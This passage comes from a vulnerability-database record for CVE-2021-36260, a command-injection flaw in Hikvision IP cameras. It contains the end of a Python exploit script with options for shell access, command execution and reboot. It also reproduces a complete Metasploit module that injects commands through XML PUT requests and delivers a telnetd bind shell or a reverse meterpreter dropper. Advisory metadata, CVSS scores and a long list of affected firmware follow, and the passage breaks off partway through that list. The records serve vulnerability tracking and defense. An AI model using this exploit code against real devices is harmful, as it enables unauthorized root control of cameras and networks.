default=80, help='Remote Target Port') \nparser.add_argument('--check', required=False, default=False, action='store_true', help='Check if vulnerable') \nparser.add_argument('--reboot', required=False, default=False, action='store_true', help='Reboot if vulnerable') \nparser.add_argument('--shell', required=False, default=False, action='store_true', help='Launch SSH shell') \nparser.add_argument('--cmd', required=False, type=str, default=None, help='execute cmd (i.e: \"ls -l\")') \nparser.add_argument('--cmd_blind', required=False, type=str, default=None, help='execute blind cmd (i.e: \"reboot\")') \nparser.add_argument( \n'--noverify', required=False, default=False, action='store_true', help='Do not verify if vulnerable' \n) \nparser.add_argument( \n'--proto', required=False, type=str, choices=['http', 'https'], default='http', help='Protocol used' \n) \nargs = parser.parse_args() \n \nremote = Http(args.rhost, args.rport, args.proto) \n \ntry: \nif args.shell: \nshell(remote, args) \nelif args.cmd: \ncmd(remote, args) \nelif args.cmd_blind: \ncmd_blind(remote, args) \nelif args.check: \ncheck(remote, args) \nelif args.reboot: \ncheck_reboot(remote, args) \nelse: \nparser.parse_args(['-h']) \nexcept KeyboardInterrupt: \nreturn False \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164603/hikvision210702-exec.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-28T16:54:58", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": 
"packetstorm", "title": "Hikvision IP Camera Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-28T00:00:00", "id": "PACKETSTORM:166167", "href": "https://packetstormsecurity.com/files/166167/Hikvision-IP-Camera-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Hikvision IP Camera Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection in a variety of Hikvision IP \ncameras (CVE-2021-36260). The module inserts a command into an XML payload used with an \nHTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution \nas the `root` user. \n \nThis module specifically attempts to exploit the blind variant of the attack. The module \nwas successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It \nwas also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. 
\nPlease see the Hikvision advisory for a full list of affected products. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Watchful_IP', # Vulnerability discovery and disclosure \n'bashis', # Proof of concept \n'jbaines-r7' # Metasploit module \n], \n'References' => [ \n[ 'CVE', '2021-36260' ], \n[ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'], \n[ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'], \n[ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py'] \n], \n'DisclosureDate' => '2021-09-18', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_ARMLE], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n# the target has very limited payload targets and a tight payload space. \n# bind_busybox_telnetd might be *the only* one. \n'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd', \n# saving four bytes of payload space by using 'sh' instead of '/bin/sh' \n'LOGIN_CMD' => 'sh', \n'Space' => 23 \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_ARMLE], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'printf', 'echo' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 80, \n'SSL' => false, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \n# Check will test two things: \n# 1. Is the endpoint a Hikvision camera? \n# 2. 
Does the endpoint respond as expected to exploitation? This module is \n# specifically testing for the blind variant of this attack so we key off \n# of the returned HTTP status code. The developer's test target responded \n# to exploitation with a 500. Notes from bashis' exploit indicate that \n# they saw targets respond with 200 as well, so we'll accept that also. \ndef check \n# Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript: \n# <script> \n# window.location.href = \"/doc/page/login.asp?_\" + (new Date()).getTime(); \n# </script> \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/') \n}) \nreturn CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res \nreturn CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200 \nreturn CheckCode::Safe('The target doesn\\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_') \n \npayload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>' \nres = send_request_cgi({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'), \n'data' => payload \n}) \n \nreturn CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res \nreturn CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500) \n \n# Some cameras are not vulnerable and still respond 500. We can weed them out by making \n# the remote target sleep and using a low timeout. This might not be good for high latency targets \n# or for people using Metasploit as a vulnerability scanner... but it's better than flagging all \n# 500 responses as vulnerable. 
\npayload = '<xml><language>$(sleep 20)</language></xml>' \nres = send_request_cgi({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'), \n'data' => payload \n}, 10) \n \nreturn CheckCode::Appears('It appears the target executed the provided sleep command.') unless res \n \nCheckCode::Safe('The target did not execute the provided sleep command.') \nend \n \ndef execute_command(cmd, _opts = {}) \n# The injection space is very small. The entire snprintf is 0x1f bytes and the \n# format string is: \n# \n# /dav/%s.tar.gz \n# \n# Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately, \n# snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for \n# our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes \n# for payload. The 'echo' stager has a minimum of 26 bytes but we obviously don't \n# have that much space. We can steal the extra space from the \"random\" file name \n# and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra \n# bytes will also allow the printf stager to do more than 1 byte per exploitation. \ncmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname) \ncmd = cmd.gsub(/ >/, '>') \ncmd = cmd.gsub(/> /, '>') \n \npayload = \"<xml><language>$(#{cmd})</language></xml>\" \nres = send_request_cgi({ \n'method' => 'PUT', \n'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'), \n'data' => payload \n}) \n \nfail_with(Failure::Disconnected, 'Connection failed') unless res \nfail_with(Failure::UnexpectedReply, \"HTTP status code is not 200 or 500: #{res.code}\") unless (res.code == 200 || res.code == 500) \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \n# generate a random value for the tmp file name. See execute_command for details \n@fname = \"tmp/#{Rex::Text.rand_text_alpha(1)}\" \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \n# 26 is technically a lie. 
See `execute_command` for additional insight \nexecute_cmdstager(linemax: 26) \nend \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166167/hikvision_cve_2021_36260_blind.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2022-03-29T07:30:05", "description": "A command injection vulnerability exists in Hikvision Web Server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-28T00:00:00", "type": "checkpoint_advisories", "title": "Hikvision Web Server Command Injection (CVE-2021-36260)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-03-28T00:00:00", "id": "CPAI-2021-1025", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-04-05T23:35:23", "description": "A command injection vulnerability in the web server of some Hikvision product. 
Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-22T13:15:00", "type": "cve", "title": "CVE-2021-36260", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-04-05T20:56:00", "cpe": ["cpe:/o:hikvision:ds-2cd3163g2-i\\(s\\)u_firmware:-", "cpe:/o:hikvision:ds-2cd2543g2-i\\(ws\\)_firmware:-", "cpe:/o:hikvision:ds-7608ni-q1_firmware:4.31.000", "cpe:/o:hikvision:ds-2df8250i8x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1_firmware:4.31.100", "cpe:/o:hikvision:ds-2df6a436x-aely\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2526g2-is_firmware:-", "cpe:/o:hikvision:ds-2df7232ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7608ni-q1\\/8p_firmware:4.31.000", "cpe:/o:hikvision:ds-7608ni-q2_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2666g2-izs_firmware:-", "cpe:/o:hikvision:ds-2td6267-75c4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2dy9236ix-a\\(t3\\)_firmware:-", 
"cpe:/o:hikvision:ds-2df8242i5x-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-aely\\(t5\\)_firmware:-", "cpe:/o:hikvision:ids-2pt9a144mxs-d\\/t2_firmware:-", "cpe:/o:hikvision:ds-2td6267-50h4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd2683g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2066g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2743g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3356g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1\\/4p\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2021g1-i\\(w\\)_firmware:-", "cpe:/o:hikvision:ds-2dy92500x-a\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df6a436x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2td8166-100c2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2td8166-180ze2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1\\/8p\\/4g_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2163g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df7225ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td1217b-6\\/pa_firmware:-", "cpe:/o:hikvision:ds-2cd2621g0-i\\(z\\)\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3343g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df7232ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2183g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2df5225x-ae3\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8a442nxs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2583g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3123g2-i\\(s\\)u_firmware:-", "cpe:/o:hikvision:ds-2cd2327g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ptz-n4225i-de_firmware:-", "cpe:/o:hikvision:ds-2td6266t-25h2l_firmware:-", "cpe:/o:hikvision:ds-2cd2721g0-i\\(z\\)\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td6266t-50h2l_firmware:-", 
"cpe:/o:hikvision:ds-2df5232x-ae3\\)t3\\)_firmware:-", "cpe:/o:hikvision:ds-2dy9236x-a\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3047g2-ls_firmware:-", "cpe:/o:hikvision:ds-2xe6452f-izh\\(r\\)s_firmware:-", "cpe:/o:hikvision:ds-2cd2326g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2446g2-i_firmware:-", "cpe:/o:hikvision:ds-2xe6482f-izhrs_firmware:-", "cpe:/o:hikvision:ds-2cd3563g2-is_firmware:-", "cpe:/o:hikvision:ds-2td8167-150zc4f\\/w_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1\\/4g_firmware:-", "cpe:/o:hikvision:ds-2cd2143g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2386g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2td8167-230zg2f\\/w_firmware:-", "cpe:/o:hikvision:ds-2df8436i5x-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3756g2-izs_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-aelw\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7604ni-q1_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2646g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3143g2-i\\(s\\)u_firmware:-", "cpe:/o:hikvision:ds-7616ni-q2\\/16p_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd3386g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3626g2-izs_firmware:-", "cpe:/o:hikvision:ds-7604ni-k1\\/4p\\/4g_firmware:-", "cpe:/o:hikvision:ds-2cd2346g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3686g2-izs_firmware:-", "cpe:/o:hikvision:ids-2sk8144ixs-d\\/j_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2323g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2td8166-150ze2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2df6a836x-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3547g2-ls_firmware:-", "cpe:/o:hikvision:ds-2cd2183g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2766g2-izs_firmware:-", "cpe:/o:hikvision:ds-2df8242i5x-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2183g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2321g0-i\\/nf_firmware:-", "cpe:/o:hikvision:ds-2cd2383g2-i\\(u\\)_firmware:-", 
"cpe:/o:hikvision:ds-2cd2166g2-i\\(su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2723g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3043g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2666g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2363g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3347g2-ls\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2563g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3523g2-is_firmware:-", "cpe:/o:hikvision:ds-2df8225ih-ael\\(w\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242i5x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td4136t-9_firmware:-", "cpe:/o:hikvision:ds-2cd2566g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3763g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2121g0-i\\(w\\)\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2783g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3643g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3026g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2df6a825x-ael_firmware:-", "cpe:/o:hikvision:ds-2cd2147g2-l\\(su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3026g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd2786g2-izs_firmware:-", "cpe:/o:hikvision:ds-2td1217b-3\\/pa_firmware:-", "cpe:/o:hikvision:ds-2cd2083g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ids-2vs435-f840-ey\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2366g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2523g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2td4137-25\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd2123g2-iu_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1\\/8p_firmware:-", "cpe:/o:hikvision:ds-2cd3056g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd3023g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-aely\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7604ni-q1\\/4p_firmware:4.31.000", "cpe:/o:hikvision:ds-2df8442ixs-aelwy\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df8225ix-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7616ni-q1_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd3063g2-iu_firmware:-", 
"cpe:/o:hikvision:ds-2cd2086g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2663g2-izs_firmware:-", "cpe:/o:hikvision:ds-2xe6422fwd-izhrs_firmware:-", "cpe:/o:hikvision:ds-2cd3656g2-izs_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1_firmware:4.31.100", "cpe:/o:hikvision:ids-2vs435-f840-ey_firmware:-", "cpe:/o:hikvision:ds-2cd3723g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3386g2-is_firmware:-", "cpe:/o:hikvision:ds-2dyh2a0ixs-d\\(t2\\)_firmware:-", "cpe:/o:hikvision:ds-2df8236i5x-aelw_firmware:-", "cpe:/o:hikvision:ds-2cd3156g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-ael\\(t2\\)_firmware:-", "cpe:/o:hikvision:ds-2td4167-50\\/w_firmware:-", "cpe:/o:hikvision:ds-2td8166-75c2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2cd3056g2iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-760ni-k1\\/4p_firmware:-", "cpe:/o:hikvision:ds-2df6a236x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242ix-aely\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2023g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2063g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2421g0-i\\(d\\)\\(w\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2623g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2366g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2xe6242f-is\\/316l\\(b\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2127g2-\\(-su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2121g1-idw_firmware:-", "cpe:/o:hikvision:ds-2td4137-50\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd2421g0-i\\(d\\)w_firmware:-", "cpe:/o:hikvision:ptz-n4215i-de_firmware:-", "cpe:/o:hikvision:ds-2cd3056g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-7104ni-q1\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2343g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2547g2-ls_firmware:-", "cpe:/o:hikvision:ds-2cd3126g2-is_firmware:-", "cpe:/o:hikvision:ds-2df8a842ixs-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2td6236t-50h2l_firmware:-", "cpe:/o:hikvision:ds-2cd2426g2-i_firmware:-", 
"cpe:/o:hikvision:ds-2cd3586g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd3126g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2df5232x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3363g2-iu_firmware:-", "cpe:/o:hikvision:ds-2cd2547g2-lzs_firmware:-", "cpe:/o:hikvision:ds-2cd3526g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd2043g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ptz-n2404i-de3_firmware:-", "cpe:/o:hikvision:ds-2td4166t-9_firmware:-", "cpe:/o:hikvision:ds-2df8a442ixs-af\\/sp\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3323g2-iu_firmware:-", "cpe:/o:hikvision:ds-2td8166-150zh2f\\/v2_firmware:-", "cpe:/o:hikvision:ds-2cd3156g2-is_firmware:-", "cpe:/o:hikvision:ds-2cd3786g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2123g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2dy9240ix-a\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2td6267-100c4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2df7225ix-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8425ix-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3186g2-is\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2163g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2td6237-75c4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2dy9236i8x-a\\(t3\\)_firmware:-", "cpe:/o:hikvision:ptz-n2204i-de3_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-aelw\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1\\/8p\\/m_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2523g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd3326g2-isu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd3623g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2047g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2121g1_firmware:-", "cpe:/o:hikvision:ds-2cd2086g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2td1117-6\\/pa_firmware:-", "cpe:/o:hikvision:ds-2df5225x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2526g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2626g2-izsu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2cd2046g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-7616ni-k1_firmware:4.31.000", 
"cpe:/o:hikvision:ds-2dy9250izs-a\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-7604ni-k1_firmware:-", "cpe:/o:hikvision:ds-2cd2121g1-i\\(w\\)_firmware:-", "cpe:/o:hikvision:ids-2sk718mxs-d_firmware:-", "cpe:/o:hikvision:ds-2td4167-25\\/w_firmware:-", "cpe:/o:hikvision:ds-2df6a436x-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2df8442ixs-aelw\\(t2\\)_firmware:-", "cpe:/o:hikvision:ds-7608ni-k1_firmware:-", "cpe:/o:hikvision:ds-2td1117-3\\/pa_firmware:-", "cpe:/o:hikvision:ds-2cd2186g2-i\\(su\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2763g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3356g2-is_firmware:-", "cpe:/o:hikvision:ds-2td8167-230zg2f\\/wy_firmware:-", "cpe:/o:hikvision:ds-2cd2686g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd3556g2-is_firmware:-", "cpe:/o:hikvision:ds-7108ni-q1\\/8p_firmware:4.31.100", "cpe:/o:hikvision:ds-2cd2026g2-iu\\/sl_firmware:-", "cpe:/o:hikvision:ds-2xe6442f-izhrs\\(b\\)_firmware:-", "cpe:/o:hikvision:ptz-n4215-de3_firmware:-", "cpe:/o:hikvision:ds-2cd3663g2-izs_firmware:-", "cpe:/o:hikvision:ds-7616ni-q2_firmware:4.31.000", "cpe:/o:hikvision:ds-2td8167-190ze2f\\/wy_firmware:-", "cpe:/o:hikvision:ds-2cd2386g2-i\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2td8167-190ze2f\\/w_firmware:-", "cpe:/o:hikvision:ds-2td1117-2\\/pa_firmware:-", "cpe:/o:hikvision:ds-7608ni-q2\\/8p_firmware:4.31.000", "cpe:/o:hikvision:ds-2cd2643g2-izs_firmware:-", "cpe:/o:hikvision:ds-2cd2186g2-isu_firmware:-", "cpe:/o:hikvision:ds-2cd2527g2-ls_firmware:-", "cpe:/o:hikvision:ds-2cd2347g2-l\\(u\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2143g2-iu_firmware:-", "cpe:/o:hikvision:ds-2df6a425x-ael\\(t3\\)_firmware:-", "cpe:/o:hikvision:ds-2df8242ix-ael\\(t5\\)_firmware:-", "cpe:/o:hikvision:ds-2cd2546g2-i\\(s\\)_firmware:-", "cpe:/o:hikvision:ds-2df6a225x-ael\\)t3\\)_firmware:-", "cpe:/o:hikvision:ds-2td6237-50h4l\\/w_firmware:-", "cpe:/o:hikvision:ds-2cd3086g2-is_firmware:-", 